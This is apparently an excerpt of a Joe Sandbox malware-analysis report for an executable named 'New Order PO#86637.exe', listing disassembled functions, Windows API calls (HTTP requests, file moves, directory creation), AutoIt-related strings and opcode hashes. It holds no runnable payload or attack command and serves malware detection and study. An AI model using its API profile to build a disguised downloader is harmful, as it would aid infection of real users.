                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                            • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                            • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                            • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                            • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                            • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_memcmp
                                                                            • String ID: '$\$h
                                                                            • API String ID: 2205784470-1303700344
                                                                            • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                            • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                            • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                            • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                            APIs
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                            • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                            • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                            • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                            • __swprintf.LIBCMT ref: 0045EC33
                                                                            • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                            Strings
                                                                            • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                            • String ID: %4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 2441338619-1568723262
                                                                            • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                            • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                            • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                            • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                            APIs
                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                            • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                            • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                            • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Interlocked$DecrementIncrement$Sleep
                                                                            • String ID: @COM_EVENTOBJ
                                                                            • API String ID: 327565842-2228938565
                                                                            • Opcode ID: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                            • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                            • Opcode Fuzzy Hash: 9e658ec2980077184a1632dd5c21727ba620fa2cdb3865c7e3de5124d93aa359
                                                                            • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                            APIs
                                                                            • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                            • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                            • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                            • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                            • VariantClear.OLEAUT32(?), ref: 00470516
                                                                              • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                            • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                              • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                            • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                            • String ID: H
                                                                            • API String ID: 3613100350-2852464175
                                                                            • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                            • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                            • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                            • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                            APIs
                                                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                            • DestroyWindow.USER32(?), ref: 00426F50
                                                                            • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                            • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                            • String ID: close all
                                                                            • API String ID: 4174999648-3243417748
                                                                            • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                            • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                            • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                            • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                            • String ID:
                                                                            • API String ID: 1291720006-3916222277
                                                                            • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                            • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                                            • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                                            • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                                            • IsMenu.USER32(?), ref: 0045FC5F
                                                                            • CreatePopupMenu.USER32 ref: 0045FC97
                                                                            • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                            • String ID: 0$2
                                                                            • API String ID: 93392585-3793063076
                                                                            • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                            • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                            • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                            • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                            APIs
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                            • VariantClear.OLEAUT32(?), ref: 00435320
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                            • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                            • String ID: crts
                                                                            • API String ID: 586820018-3724388283
                                                                            • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                            • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                            • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                            • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                            APIs
                                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\New Order PO#86637.exe,0040F545,C:\Users\user\Desktop\New Order PO#86637.exe,004A90E8,C:\Users\user\Desktop\New Order PO#86637.exe,?,0040F545), ref: 0041013C
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                            • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                            • _wcscat.LIBCMT ref: 0044BCAF
                                                                            • _wcslen.LIBCMT ref: 0044BCBB
                                                                            • _wcslen.LIBCMT ref: 0044BCD1
                                                                            • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 2326526234-1173974218
                                                                            • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                            • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                            • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                            • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                            APIs
                                                                              • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                            • _wcslen.LIBCMT ref: 004335F2
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                            • GetLastError.KERNEL32 ref: 0043362B
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                            • _wcsrchr.LIBCMT ref: 00433666
                                                                              • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                            • String ID: \
                                                                            • API String ID: 321622961-2967466578
                                                                            • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                            • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                            • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                            • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                            • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                            • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                            • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                            • __lock.LIBCMT ref: 00417981
                                                                              • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                              • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                              • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                            • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                            • __lock.LIBCMT ref: 004179A2
                                                                            • ___addlocaleref.LIBCMT ref: 004179C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                            • String ID: KERNEL32.DLL$pI
                                                                            • API String ID: 637971194-197072765
                                                                            • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                            • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                            • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                            • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
